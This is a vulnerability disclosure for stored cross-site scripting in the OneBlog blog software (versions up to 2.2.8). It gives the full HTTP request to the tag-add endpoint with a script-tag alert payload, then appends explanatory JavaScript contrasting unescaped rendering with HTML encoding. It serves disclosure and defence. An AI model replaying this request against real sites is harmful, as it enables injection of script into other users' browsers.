Cross Site Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8. via
<script>alert("xss")</script> code
Access the add function in the operation tab list in the background, and then inject
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/zhangyd-c/OneBlog
[Affected Product Code Base]
OneBlog- <=2.2.8
[Affected Component]
POST /tag/add HTTP/1.1
Host: localhost:8085
Content-Length: 70
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8085
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8085/article/tags
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=f0757d8a-afb9-403a-b1f2-5d7c3e3a9d00
Connection: close

id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E
[Attack Type]
Remote
[Impact Code execution]

true
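Added example, not part of the original report and not OneBlog's code: it decodes the form body from the request above and contrasts raw string concatenation with HTML output encoding when the tag fields are written into a list row. The renderer functions and all names are hypothetical; how OneBlog actually renders the tag list is not shown on this page.

```javascript
// Request body exactly as it appears in the report above.
const REPORTED_BODY =
  'id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E';

// Parse application/x-www-form-urlencoded data into a plain object.
function parseForm(body) {
  const fields = {};
  for (const [key, value] of new URLSearchParams(body)) {
    fields[key] = value;
  }
  return fields;
}

// Encode the characters that are significant in HTML text nodes and in
// quoted attribute values.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Hypothetical renderer, unsafe form: stored values are concatenated into
// markup unchanged, so a stored <script> element reaches the page as markup.
function renderTagRowUnsafe(tag) {
  return `<tr><td>${tag.name}</td><td>${tag.description}</td></tr>`;
}

// Hypothetical renderer, hardened form: every stored value is encoded at
// the point of output, so it is displayed as text.
function renderTagRow(tag) {
  return `<tr><td>${escapeHtml(tag.name)}</td>` +
         `<td>${escapeHtml(tag.description)}</td></tr>`;
}

// Input-side check usable for logging or rejection: list the fields that
// carry angle brackets. This complements output encoding, it does not
// replace it.
function fieldsWithMarkup(fields) {
  return Object.keys(fields).filter((key) => /[<>]/.test(fields[key]));
}

const tag = parseForm(REPORTED_BODY);
console.log('fields with markup:', fieldsWithMarkup(tag));
console.log('unsafe row:  ', renderTagRowUnsafe(tag));
console.log('encoded row: ', renderTagRow(tag));
```
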